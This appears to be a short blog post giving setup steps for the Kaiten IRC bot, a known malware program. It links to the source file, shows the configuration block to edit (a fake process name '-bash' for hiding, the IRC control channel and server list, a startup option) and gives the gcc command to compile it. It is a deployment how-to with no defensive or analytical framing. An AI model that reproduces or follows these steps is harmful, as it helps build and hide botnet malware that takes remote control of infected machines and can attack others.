First you need the script : https://packetstormsecurity.com/files/25575/kaiten.c.html
Then Configure the script to your settings by editing the kaiten.c file
only configure this part: this is my example
//////////////////////////////////////////////////////////////////////////////// // EDIT THESE // //////////////////////////////////////////////////////////////////////////////// #undef STARTUP // Start on startup? #undef IDENT // Only enable this if you absolutely have to #define FAKENAME "-bash" // What you want this to hide as #define CHAN "#hi" // Channel to join #define KEY "" // The key of the channel int numservers=4; // Must change this to equal number of servers down there char *servers[] = { // List the servers in that format, always end in (void*)0 "YOUR.IRC.SERVER", "", "", "", (void*)0 }; //////////////////////////////////////////////////////////////////////////////// // STOP HERE! // ////////////////////////////////////////////////////////////////////////////////
compile the c script into a binary by typing this command
gcc -o outputname kaiten.c
No comments:
Post a Comment